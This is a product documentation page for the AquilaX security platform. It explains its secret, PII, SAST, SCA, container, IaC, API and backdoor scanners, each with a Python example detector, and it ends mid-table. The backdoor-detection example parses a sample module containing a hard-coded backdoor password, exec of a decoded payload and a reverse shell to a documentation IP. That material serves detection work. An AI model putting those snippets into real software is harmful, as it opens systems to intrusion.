# Scanners

<table><thead><tr><th width="137.33333333333331">Scanner</th><th width="523">Description</th><th>Logo</th></tr></thead><tbody><tr><td><strong>Secret</strong></td><td>Identification of passwords, API keys and other highly confidential information in the source code</td><td><img src="/files/x3NFpiqiy7FRF3WFnvdP" alt=""></td></tr><tr><td><strong>PII</strong></td><td>Identification of Personally Identifiable Information (PII) that may have leaked into the source code</td><td><img src="/files/6sgHI8s6xnhBihs2oOB3" alt="" data-size="original"></td></tr><tr><td><strong>SAST</strong></td><td>Static Application Security Testing: security scanning for vulnerabilities introduced unintentionally by developers while writing source code. Also often referred to as code scanning or 1st-party code scanning</td><td><img src="/files/56TFnsVlaymlJuFJ6TZT" alt="" data-size="original"></td></tr><tr><td><strong>SCA</strong></td><td>Software Composition Analysis is a technique to identify the use of 3rd-party components (usually open source libraries) that may contain known vulnerabilities</td><td><img src="/files/IioSTCoeq5zcxnwUK03Y" alt="" data-size="original"></td></tr><tr><td><strong>Container</strong></td><td>Container scanning is a technique that, although it overlaps with SCA, usually targets vulnerable software installed in the image (OS packages, runtimes) rather than vulnerable application libraries. It is used during image creation</td><td><img src="/files/OMnltApzMQ11sBrYtkoB" alt="" data-size="original"></td></tr><tr><td><strong>IaC</strong></td><td>Infrastructure as Code scanning identifies security misconfigurations in infrastructure as defined in Terraform or CloudFormation configuration files</td><td><img src="/files/uMau4SK4LWmaPwSIiCzb" alt="" data-size="original"></td></tr><tr><td><strong>API</strong></td><td>API scanning is the process of identifying potential security issues based on the definition of the API, for example from an OpenAPI specification</td><td><img src="/files/n46QL0k4cCX5xZyNk59s" alt="" data-size="original"></td></tr><tr><td><strong>Malware</strong></td><td>Malware scanning of the source code (in the AquilaX case) is the capability to identify intentionally malicious code such as backdoors, trojan horses and viruses that may have been injected into the application source code</td><td><img src="/files/GRXcdg5BVYIMbjvblZ2j" alt="" data-size="original"></td></tr></tbody></table>

{% embed url="<https://www.youtube.com/watch?v=g9duRq9B-lQ>" %}
Presented by Cristina, Risk Manager @ AquilaX AI
{% endembed %}

## Scanning Functionalities: <a href="#scanning-functionalities" id="scanning-functionalities"></a>

### **Secret & API Keys Scanning**

AquilaX scans codebases for hardcoded secrets: passwords, tokens, private keys and API keys that, if exposed, could lead to security breaches. A secret that has been committed should be treated as compromised even after it is removed from the current revision, because it remains in the repository history; the remediation is to rotate it, not only to delete it. By identifying these exposures early, AquilaX helps developers secure their applications against unauthorized access.

### **PII & Confidential Data Detection**

Personally Identifiable Information (PII) detection is crucial for compliance with data protection regulations like GDPR and CCPA. AquilaX uses pattern matching and machine learning to detect PII and other confidential data within source code and repositories, including social security numbers, credit card numbers and personal addresses, which should never appear in code, fixtures or test data. This helps organizations maintain data privacy and integrity.
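The two sections above describe the same mechanics: fixed-format rules for credentials with a known shape, keyword rules for suspicious assignments, entropy for secrets with no known shape, and validity checks so that PII rules do not fire on every 16-digit number. The following is an added example written for this page, not AquilaX code; the regexes for AWS access key IDs and GitHub tokens, the entropy threshold and the sample settings file are all this example's own assumptions.

```python
"""Added example (not AquilaX code): a minimal secret and PII scanner combining
format rules, keyword rules, Shannon entropy and a Luhn check for card numbers."""
from __future__ import annotations

import math
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample input: a fictional settings file, one case per line.
SAMPLE_SOURCE = """\
DB_PASSWORD = "hunter2"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
GITHUB_TOKEN = "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij"
api_token = "8f3a9c1e2b7d4f6a0c5e9b1d3f7a2c4e"
log_level = "DEBUG"
customer_card = "4111 1111 1111 1111"
order_id = "1234 5678 9012 3456"
ssn = "078-05-1120"
"""

# Assumed shapes for two well-known credential formats (this example's own patterns).
FORMAT_RULES = [
    ("aws-access-key-id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github-pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
]
KEYWORD_RULE = re.compile(
    r"(?i)\b\w*(password|passwd|secret|token|api_?key)\w*\s*[=:]\s*[\"']([^\"']{4,})[\"']"
)
QUOTED_STRING = re.compile(r"[\"']([^\"'\s]{20,})[\"']")
ENTROPY_THRESHOLD = 3.5  # bits/char; random hex is close to 4.0, prose sits around 2.5-3.0
CARD_RULE = re.compile(r"\b(?:\d[ -]?){15}\d\b")  # 16 digits, optional single separators
SSN_RULE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    masked_value: str


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character (0.0 for empty or single-symbol input)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def luhn_valid(digits: str) -> bool:
    """Luhn checksum used by payment cards; filters random digit runs out of card findings."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(value: str) -> str:
    """Reports must not echo the secret itself; keep a short prefix for triage."""
    return value[:4] + "*" * (len(value) - 4) if len(value) > 4 else "****"


def scan(source: str) -> list[Finding]:
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        format_hit = False
        for rule, rx in FORMAT_RULES:
            for m in rx.finditer(line):
                findings.append(Finding(lineno, rule, mask(m.group(0))))
                format_hit = True
        m = KEYWORD_RULE.search(line)
        if m:
            findings.append(Finding(lineno, "keyword-assignment", mask(m.group(2))))
        if not format_hit:  # entropy is the fallback for secrets with no known shape
            for m in QUOTED_STRING.finditer(line):
                if shannon_entropy(m.group(1)) >= ENTROPY_THRESHOLD:
                    findings.append(Finding(lineno, "high-entropy-string", mask(m.group(1))))
        for m in CARD_RULE.finditer(line):
            digits = re.sub(r"\D", "", m.group(0))
            if luhn_valid(digits):  # 16 digits that fail Luhn are not reported as a card
                findings.append(Finding(lineno, "pii-card-number", mask(digits)))
        for m in SSN_RULE.finditer(line):
            findings.append(Finding(lineno, "pii-ssn", mask(m.group(0))))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_SOURCE):
        print(f"line {f.line}: {f.rule}: {f.masked_value}")
```

Running it on the sample reports lines 1, 2, 3, 4, 6 and 8 and stays silent on `log_level` and on the 16-digit `order_id`, which fails the Luhn check. Entropy is deliberately applied only when no format rule matched, and the keyword rule fires on the assignment regardless of the value's shape, which is how `hunter2` is caught despite its low entropy.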

### **Static Application Security Testing (SAST)**

SAST is a critical component of secure software development. AquilaX performs static analysis of the source code to identify vulnerabilities, security flaws and coding errors early in the development lifecycle, without running the application. It can detect common issues such as SQL injection, cross-site scripting (XSS) and buffer overflows, so that developers can remediate them before deployment.
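To make the "static" part concrete, the following is an added example (not AquilaX code) of one SAST rule for the SQL injection case written against Python's `ast` module: it walks the syntax tree, finds calls to a query sink and checks whether the query expression is a string constant or something built at runtime. The sink names, the sample module and the rule wording are this example's own; a production engine would add taint tracking to decide whether the interpolated value is attacker-controlled.

```python
"""Added example (not AquilaX code): a tiny SAST rule that flags SQL built from
non-constant strings at a cursor.execute() sink, using only the shape of the AST."""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Constructed sample: three unsafe calls followed by two safe ones.
SAMPLE_SOURCE = '''\
import sqlite3

def find_user(conn, username):
    cur = conn.cursor()
    cur.execute("SELECT * FROM users WHERE name = '%s'" % username)
    cur.execute("SELECT * FROM users WHERE name = '" + username + "'")
    cur.execute(f"SELECT * FROM users WHERE name = '{username}'")
    cur.execute("SELECT * FROM users WHERE name = ?", (username,))
    cur.execute("SELECT * FROM users")
    return cur.fetchall()
'''

SINKS = {"execute", "executemany", "executescript"}  # assumed DB-API sink names


@dataclass(frozen=True)
class Finding:
    line: int
    reason: str


def dynamic_reason(node: ast.expr) -> str | None:
    """Return why the query expression is not a constant, or None when it is safe."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return None
    if isinstance(node, ast.JoinedStr):
        return "f-string interpolation"
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Mod):
        return "%-formatting"
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        return "string concatenation"
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "format"):
        return "str.format()"
    # A bare variable may be fine (constant defined elsewhere) or not; that is
    # where taint analysis takes over in a real engine.
    return "non-constant expression (needs taint analysis)"


class SqlSinkVisitor(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: list[Finding] = []

    def visit_Call(self, node: ast.Call) -> None:
        func = node.func
        if isinstance(func, ast.Attribute) and func.attr in SINKS and node.args:
            reason = dynamic_reason(node.args[0])
            if reason is not None:
                self.findings.append(Finding(node.lineno, reason))
        self.generic_visit(node)


def scan_source(source: str) -> list[Finding]:
    """Parse `source` and return one finding per sink call with a non-constant query."""
    visitor = SqlSinkVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"line {f.line}: SQL query built with {f.reason}")
```

The parameterised call on line 8 of the sample passes a constant query and binds `username` separately, so the rule stays quiet there; the three lines above it are reported with the construct that makes them dynamic.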

### **Software Composition Analysis (SCA)**

AquilaX checks dependencies to identify vulnerable components and libraries in the software stack. By matching third-party dependencies against their known vulnerabilities, AquilaX helps organizations mitigate the risks of outdated or insecure components and keep the application's dependencies sound.
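The core of SCA is a join between the dependency manifest and an advisory feed, keyed on a normalised package name and an affected-version range. The following is an added example (not AquilaX code) of that join for a pinned `requirements.txt`; the package names and advisory identifiers are fictional and constructed for the example, the version comparison handles plain dotted numbers only, and a real implementation would use `packaging.version` and a feed such as OSV or the GitHub Advisory Database.

```python
"""Added example (not AquilaX code): matching pinned requirements against an
advisory feed. Packages, versions and advisory IDs below are all fictional."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed requirements.txt content.
REQUIREMENTS = """\
# runtime deps
fictional-http==2.19.1
fictional-yaml==5.3.1
Fictional_Crypto == 3.0.0
fictional-cli>=1.0      # not an exact pin: cannot be matched reliably
"""

# Constructed advisories: affected when introduced <= version < fixed (fixed=None: no fix yet).
ADVISORIES = [
    {"id": "EXAMPLE-2024-0001", "package": "fictional-http", "introduced": "2.0.0", "fixed": "2.20.0"},
    {"id": "EXAMPLE-2024-0002", "package": "fictional-yaml", "introduced": "0", "fixed": "5.3.1"},
    {"id": "EXAMPLE-2024-0003", "package": "fictional-crypto", "introduced": "3.0", "fixed": None},
]

PIN = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][0-9.]*)$")
ANY_REQ = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")


@dataclass(frozen=True)
class Match:
    package: str
    version: str
    advisory: str
    fixed: str | None


def normalize_name(name: str) -> str:
    """PEP 503 normalisation so Fictional_Crypto and fictional-crypto compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(v: str) -> tuple[int, ...]:
    """Numeric dotted versions only; trailing zeros dropped so that 3.0 == 3.0.0."""
    parts = [int(p) for p in v.split(".")]
    while len(parts) > 1 and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def is_affected(version: str, introduced: str, fixed: str | None) -> bool:
    v = parse_version(version)
    if v < parse_version(introduced):
        return False
    return fixed is None or v < parse_version(fixed)


def scan_requirements(text: str) -> tuple[list[Match], list[str]]:
    """Return (vulnerable pins, normalised names of requirements that are not exact pins)."""
    matches: list[Match] = []
    unpinned: list[str] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = PIN.match(line)
        if not m:
            req = ANY_REQ.match(line)
            if req:
                unpinned.append(normalize_name(req.group(1)))
            continue
        name, version = normalize_name(m.group(1)), m.group(2)
        for adv in ADVISORIES:
            if adv["package"] == name and is_affected(version, adv["introduced"], adv["fixed"]):
                matches.append(Match(name, version, adv["id"], adv["fixed"]))
    return matches, unpinned


if __name__ == "__main__":
    vulnerable, loose = scan_requirements(REQUIREMENTS)
    for m in vulnerable:
        print(f"{m.package}=={m.version}: {m.advisory} (fix: {m.fixed or 'none available'})")
    for name in loose:
        print(f"{name}: version not pinned, resolve the lock file before scanning")
```

Two details matter in practice and are reflected above: names must be normalised before comparison or `Fictional_Crypto` silently misses its advisory, and an unpinned requirement cannot be matched at all, so the scanner should work from a lock file or resolved environment rather than the loose manifest.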

### **Container Scanning**

Containers are now the default unit of deployment, and an image carries its own operating system packages and runtime alongside the application. AquilaX provides container scanning to assess the security posture of Docker images and containerized environments. By scanning images for vulnerabilities, misconfigurations and compliance issues, AquilaX helps organizations maintain the security of their containerized deployments.
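Besides matching OS packages in the image layers against advisories (the SCA join above, applied to `dpkg`/`apk` metadata instead of a manifest), a container scanner checks how the image is built. The following is an added example (not AquilaX code) of that second part: a small Dockerfile linter with five checks, run over an insecure and a hardened Dockerfile that are both constructed for the example; the rule names are this example's own.

```python
"""Added example (not AquilaX code): Dockerfile misconfiguration checks."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed Dockerfiles: the first one trips every rule, the second one none.
INSECURE_DOCKERFILE = """\
FROM python:latest
ENV API_TOKEN=abc123secret \\
    LOG_LEVEL=info
ADD https://downloads.example.invalid/app.tar.gz /opt/app/
RUN pip install -r /opt/app/requirements.txt
EXPOSE 22 8080
CMD ["python", "/opt/app/app.py"]
"""

HARDENED_DOCKERFILE = """\
FROM python:3.12-slim AS runtime
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt \\
    && useradd --create-home --shell /usr/sbin/nologin app
COPY . .
USER app
EXPOSE 8080
CMD ["python", "app.py"]
"""

SECRET_KEY = re.compile(r"(?i)(password|passwd|secret|token|api_?key)")


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


def parse_instructions(text: str) -> list[tuple[int, str, str]]:
    """(line, INSTRUCTION, arguments) triples; joins backslash continuations, drops comments."""
    instructions: list[tuple[int, str, str]] = []
    buf, start = "", 0
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.rstrip()
        if not buf and (not line.strip() or line.lstrip().startswith("#")):
            continue
        if not buf:
            start = lineno
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        parts = buf.strip().split(None, 1)
        instructions.append((start, parts[0].upper(), parts[1] if len(parts) > 1 else ""))
        buf = ""
    return instructions


def lint_dockerfile(text: str) -> list[Finding]:
    findings: list[Finding] = []
    instructions = parse_instructions(text)
    last_from = max((i for i, (_, ins, _) in enumerate(instructions) if ins == "FROM"), default=-1)
    final_stage = instructions[last_from + 1:]  # only the last stage ships in the image
    for line, ins, args in instructions:
        if ins == "FROM":
            image = args.split()[0]  # drop "AS name"
            if image != "scratch" and "@sha256:" not in image:
                tag = image.rsplit("/", 1)[-1].partition(":")[2]
                if tag in ("", "latest"):
                    findings.append(Finding(line, "unpinned-base-image", image))
        elif ins in ("ENV", "ARG"):
            # Values baked in with ENV/ARG end up in image config and `docker history`.
            keys = re.findall(r"([A-Za-z_][A-Za-z0-9_]*)=", args) or args.split()[:1]
            for key in keys:
                if SECRET_KEY.search(key):
                    findings.append(Finding(line, "secret-in-build-config", key))
        elif ins == "ADD" and re.match(r"https?://", args):
            findings.append(Finding(line, "add-from-remote-url", args.split()[0]))
        elif ins == "EXPOSE" and "22" in args.split():
            findings.append(Finding(line, "ssh-port-exposed", args))
    users = [args.split(":")[0] for _, ins, args in final_stage if ins == "USER"]
    if not users or users[-1] in ("root", "0"):
        stage_line = instructions[last_from][0] if last_from >= 0 else 0
        findings.append(Finding(stage_line, "runs-as-root", users[-1] if users else "no USER instruction"))
    return findings


if __name__ == "__main__":
    for f in lint_dockerfile(INSECURE_DOCKERFILE):
        print(f"line {f.line}: {f.rule}: {f.detail}")
    print("hardened:", lint_dockerfile(HARDENED_DOCKERFILE) or "no findings")
```

The `USER` check looks only at the final stage because a builder stage that runs as root is harmless once discarded; `ADD` from a URL is flagged because the download is neither verified nor cached by the build, whereas `COPY` of a file fetched and checksummed in a separate step is.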

### **Infrastructure as Code (IaC) Scanning**

With Infrastructure as Code (IaC), a misconfiguration in a template is reproduced in every environment built from it, so it can have significant consequences. AquilaX offers IaC scanning to analyze configuration files (e.g., Terraform, CloudFormation) and detect misconfigurations, security loopholes and compliance violations before the infrastructure is provisioned. This ensures that infrastructure deployments adhere to security best practices and compliance standards.
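An IaC check is a predicate over the parsed resource graph. The following is an added example (not AquilaX code) of three such checks over Terraform's JSON configuration syntax (`.tf.json`, equivalent to HCL but parseable with the standard library): a security group open to the world on an administrative port, a publicly readable S3 bucket ACL (the older `acl` argument on `aws_s3_bucket`), and an RDS instance that is public or unencrypted. The configuration is constructed for the example and the rule names are this example's own.

```python
"""Added example (not AquilaX code): IaC misconfiguration checks over Terraform
JSON syntax. Configuration below is constructed."""
from __future__ import annotations

import json
from dataclasses import dataclass

TF_JSON = """\
{
  "resource": {
    "aws_security_group": {
      "web": {
        "name": "web",
        "ingress": [
          {"from_port": 443, "to_port": 443, "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]},
          {"from_port": 22,  "to_port": 22,  "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]}
        ]
      },
      "db": {
        "name": "db",
        "ingress": {"from_port": 5432, "to_port": 5432, "protocol": "tcp", "cidr_blocks": ["10.0.0.0/8"]}
      }
    },
    "aws_s3_bucket": {"logs": {"bucket": "example-logs", "acl": "public-read"}},
    "aws_db_instance": {
      "main": {"engine": "postgres", "publicly_accessible": true, "storage_encrypted": false}
    }
  }
}
"""

ADMIN_PORTS = {22, 3389}
WORLD = {"0.0.0.0/0", "::/0"}


@dataclass(frozen=True)
class Finding:
    address: str  # Terraform resource address, e.g. aws_security_group.web
    rule: str
    detail: str


def as_list(block):
    """Nested blocks in .tf.json may be a single object or a list of objects."""
    if block is None:
        return []
    return block if isinstance(block, list) else [block]


def iter_resources(config: dict):
    for rtype, instances in config.get("resource", {}).items():
        for name, body in instances.items():
            yield f"{rtype}.{name}", rtype, body


def check_security_group(address: str, body: dict):
    for rule in as_list(body.get("ingress")):
        cidrs = set(as_list(rule.get("cidr_blocks"))) | set(as_list(rule.get("ipv6_cidr_blocks")))
        if not cidrs & WORLD:
            continue
        lo, hi = int(rule.get("from_port", 0)), int(rule.get("to_port", 0))
        all_ports = (lo == 0 and hi == 0) or rule.get("protocol") == "-1"
        if all_ports or any(lo <= p <= hi for p in ADMIN_PORTS):
            yield Finding(address, "ingress-open-to-world", f"ports {lo}-{hi} from {sorted(cidrs & WORLD)}")


def check_s3_bucket(address: str, body: dict):
    if body.get("acl") in ("public-read", "public-read-write"):
        yield Finding(address, "public-bucket-acl", body["acl"])


def check_db_instance(address: str, body: dict):
    if body.get("publicly_accessible") is True:
        yield Finding(address, "database-publicly-accessible", "publicly_accessible = true")
    if body.get("storage_encrypted") is not True:  # absent means the provider default, not encrypted
        yield Finding(address, "database-storage-unencrypted", "storage_encrypted != true")


CHECKS = {
    "aws_security_group": check_security_group,
    "aws_s3_bucket": check_s3_bucket,
    "aws_db_instance": check_db_instance,
}


def scan_tf_json(text: str) -> list[Finding]:
    config = json.loads(text)
    findings: list[Finding] = []
    for address, rtype, body in iter_resources(config):
        check = CHECKS.get(rtype)
        if check:
            findings.extend(check(address, body))
    return findings


if __name__ == "__main__":
    for f in scan_tf_json(TF_JSON):
        print(f"{f.address}: {f.rule} ({f.detail})")
```

The 443 rule on `aws_security_group.web` is world-open too but is not reported: the check distinguishes a public web port from an administrative one, which is the kind of policy decision that separates a useful IaC scanner from a noisy one. For HCL input the same predicates apply once the file is parsed with an HCL library.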

### **API Security**

APIs play a critical role in modern application architectures, but they introduce security risks if not properly secured. AquilaX specializes in API security testing, identifying vulnerabilities such as insecure authentication mechanisms, excessive data exposure and insufficient access controls, starting from the API definition itself. By assessing the security of APIs, AquilaX helps organizations safeguard their digital assets and prevent API-related security breaches.
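Several of these weaknesses are visible in the OpenAPI document before a single request is sent. The following is an added example (not AquilaX code) with three definition-level checks: operations reachable without any security requirement, response schemas that carry sensitive fields (excessive data exposure), and servers declared over plain HTTP. The specification is constructed for the example, the sensitive-field pattern is this example's own assumption, and only local `$ref` pointers are resolved.

```python
"""Added example (not AquilaX code): static checks over an OpenAPI 3 document.
The spec below is constructed."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

OPENAPI_JSON = """\
{
  "openapi": "3.0.3",
  "info": {"title": "Example API", "version": "1.0.0"},
  "servers": [{"url": "http://api.example.invalid/v1"}],
  "security": [{"bearerAuth": []}],
  "components": {
    "securitySchemes": {"bearerAuth": {"type": "http", "scheme": "bearer"}},
    "schemas": {
      "User": {"type": "object", "properties": {
        "id": {"type": "integer"}, "email": {"type": "string"},
        "password_hash": {"type": "string"}, "address": {"$ref": "#/components/schemas/Address"}}},
      "Address": {"type": "object", "properties": {"city": {"type": "string"}, "ssn": {"type": "string"}}}
    }
  },
  "paths": {
    "/users/{id}": {"get": {"responses": {"200": {"description": "ok",
      "content": {"application/json": {"schema": {"$ref": "#/components/schemas/User"}}}}}}},
    "/users": {"get": {"responses": {"200": {"description": "ok",
      "content": {"application/json": {"schema": {"type": "array", "items": {"$ref": "#/components/schemas/User"}}}}}}}},
    "/health": {"get": {"security": [], "responses": {"200": {"description": "ok"}}}},
    "/admin/users/{id}": {"delete": {"security": [], "responses": {"204": {"description": "deleted"}}}}
  }
}
"""

HTTP_METHODS = {"get", "put", "post", "delete", "patch", "options", "head", "trace"}
SENSITIVE_FIELD = re.compile(r"(?i)(password|passwd|secret|token|ssn|social_security|card_number|cvv)")


@dataclass(frozen=True)
class Finding:
    location: str
    rule: str
    detail: str


def resolve(spec: dict, node):
    """Follow local $ref pointers (#/components/...); external refs are left untouched."""
    while isinstance(node, dict) and isinstance(node.get("$ref"), str) and node["$ref"].startswith("#/"):
        target = spec
        for part in node["$ref"][2:].split("/"):
            target = target[part]
        node = target
    return node


def sensitive_fields(spec: dict, schema, path: str = "", depth: int = 0) -> list[str]:
    """Dotted paths of sensitive properties in a schema (objects, arrays, $refs)."""
    schema = resolve(spec, schema)
    if not isinstance(schema, dict) or depth > 8:  # depth guard against recursive schemas
        return []
    found: list[str] = []
    for name, sub in schema.get("properties", {}).items():
        full = f"{path}.{name}" if path else name
        if SENSITIVE_FIELD.search(name):
            found.append(full)
        found.extend(sensitive_fields(spec, sub, full, depth + 1))
    if "items" in schema:
        found.extend(sensitive_fields(spec, schema["items"], path + "[]", depth + 1))
    return found


def scan_openapi(text: str) -> list[Finding]:
    spec = json.loads(text)
    findings: list[Finding] = []
    for server in spec.get("servers", []):
        if server.get("url", "").startswith("http://"):
            findings.append(Finding("servers", "plaintext-server-url", server["url"]))
    global_security = spec.get("security", [])
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method not in HTTP_METHODS:
                continue
            location = f"{method.upper()} {path}"
            # An operation-level `security` overrides the global list; [] disables auth entirely.
            if not op.get("security", global_security):
                findings.append(Finding(location, "unauthenticated-operation",
                                        "read-only" if method == "get" else "state-changing"))
            for status, resp in op.get("responses", {}).items():
                for media, content in resp.get("content", {}).items():
                    for field in sensitive_fields(spec, content.get("schema")):
                        findings.append(Finding(location, "sensitive-field-in-response", f"{status} {media}: {field}"))
    return findings


if __name__ == "__main__":
    for f in scan_openapi(OPENAPI_JSON):
        print(f"{f.location}: {f.rule}: {f.detail}")
```

`GET /health` with `security: []` is reported as well; an unauthenticated health endpoint is usually intended, so a scanner needs an allow-list for such cases, while the unauthenticated `DELETE` is the finding that matters. The definition can only show what is declared: whether the bearer token is actually validated per object (object-level authorization) still requires testing the running API.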

### **Uncovering Backdoor Functionalities**

Backdoors are hidden entry points into a system, either planted deliberately or left behind inadvertently during development (for example, a debug login or an undocumented administrative endpoint). AquilaX uses advanced techniques to uncover backdoor functionality within source code and binaries. By identifying and removing backdoors, AquilaX helps organizations prevent unauthorized access and maintain the integrity of their applications.
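Unlike the SAST rules earlier on this page, which look for mistakes, backdoor detection looks for intent, and the signatures are correspondingly different. The following is an added example (not AquilaX code) of three heuristic signatures over a Python syntax tree: a hard-coded credential comparison in an authentication path, `exec()`/`eval()` of a decoded payload, and a socket duplicated onto standard I/O before spawning a shell (the reverse-shell pattern). The sample module is constructed for the example, is only parsed and never executed, and the decoder and shell-spawning function names it recognises are this example's own assumptions.

```python
"""Added example (not AquilaX code): heuristic backdoor signatures over Python's ast."""
from __future__ import annotations

import ast
import re
from dataclasses import dataclass

# Constructed sample module; it is parsed, never run. 198.51.100.0/24 is a documentation range.
SAMPLE_MODULE = '''\
import base64, os, socket, subprocess

def authenticate(user, password):
    if user == "support" and password == "s3cr3t-backdoor":
        return True
    return check_db(user, password)

def update_check():
    payload = "cHJpbnQoJ2hpJyk="
    exec(base64.b64decode(payload))

def diag():
    s = socket.socket()
    s.connect(("198.51.100.7", 4444))
    os.dup2(s.fileno(), 0)
    subprocess.call(["/bin/sh", "-i"])
'''

CREDENTIAL_NAME = re.compile(r"(?i)(pass|pwd|token|secret|api_?key)")
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "decompress", "fromhex", "unhexlify"}
DYNAMIC_EXEC = {"exec", "eval"}
SHELL_SPAWNERS = {"subprocess.call", "subprocess.Popen", "os.system", "os.execv", "pty.spawn"}


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


def dotted(node: ast.expr) -> str:
    """'os.dup2' for Attribute(Name('os'), 'dup2'), the id for a Name, '' for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def credential_literal_compare(node: ast.Compare) -> str | None:
    """`password == "literal"` on either side, with a credential-looking variable name."""
    if len(node.ops) != 1 or not isinstance(node.ops[0], (ast.Eq, ast.NotEq)):
        return None
    for a, b in ((node.left, node.comparators[0]), (node.comparators[0], node.left)):
        if (isinstance(a, ast.Name) and CREDENTIAL_NAME.search(a.id)
                and isinstance(b, ast.Constant) and isinstance(b.value, str)):
            return a.id
    return None


def scan_backdoors(source: str) -> list[Finding]:
    tree = ast.parse(source)
    findings: list[Finding] = []
    calls: dict[str, int] = {}  # dotted callee -> line first seen, for the multi-call rule
    for node in ast.walk(tree):
        if isinstance(node, ast.Compare):
            name = credential_literal_compare(node)
            if name:
                findings.append(Finding(node.lineno, "hardcoded-credential-check", name))
        elif isinstance(node, ast.Call):
            callee = dotted(node.func)
            calls.setdefault(callee, node.lineno)
            if callee in DYNAMIC_EXEC and any(
                isinstance(inner, ast.Call) and dotted(inner.func).rsplit(".", 1)[-1] in DECODERS
                for arg in node.args for inner in ast.walk(arg)
            ):
                findings.append(Finding(node.lineno, "exec-of-decoded-payload", callee))
    if "os.dup2" in calls and "socket.socket" in calls and calls.keys() & SHELL_SPAWNERS:
        findings.append(Finding(calls["os.dup2"], "reverse-shell-pattern",
                                "socket fd duplicated onto stdio before spawning a shell"))
    return sorted(findings, key=lambda f: f.line)


if __name__ == "__main__":
    for f in scan_backdoors(SAMPLE_MODULE):
        print(f"line {f.line}: {f.rule}: {f.detail}")
```

The credential rule fires on the comparison against a string literal, not on the name alone, so `password == hash_lookup(user)` is left alone. The reverse-shell rule is a conjunction over the whole module rather than a single call, which is typical of intent-based signatures: each call is legitimate by itself and only the combination is suspicious. All three are heuristics and produce false positives on tooling that legitimately decodes and executes code, so such findings warrant review rather than automatic failure.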

## 3rd party tools

AquilaX acknowledges the significant contributions of other teams in the field by integrating third-party scanners directly into its engine. This approach ensures that customers benefit from a seamless and user-friendly application security (AppSec) scanning experience. In addition to our in-house developed engines, here is a list of the scanners we utilize:

<figure><img src="/files/ZSdohwsgJr36wEJRVH8e" alt=""><figcaption><p>AquilaX 3rd party scanners</p></figcaption></figure>

<table><thead><tr><th width="152">Tool</th><th width="86" data-type="checkbox">Secret</th><th width="59" data-type="checkbox">PII</th><th width="75" data-type="checkbox">SAST</th><th width="69" data-type="checkbox">SCA</th><th width="60" data-type="checkbox">IaC</th><th width="108" data-type="checkbox">Container</th><th width="60" data-type="checkbox">API</th><th data-type="checkbox">Malware</th></tr></thead><tbody><tr><td>AquilaX</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td><td>true</td></tr><tr><td>Checkov</td><td>true</td><td>false</td><td>false</td><td>true</td><td>true</td><td>true</td><td>true</td><td>false</td></tr><tr><td>GitLeaks</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Bandit</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Pyre</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>CatchIT</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>GoSec</td><td>true</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Horusec</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>insider</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Syft</td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td>Grype</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td></tr><tr><td><a 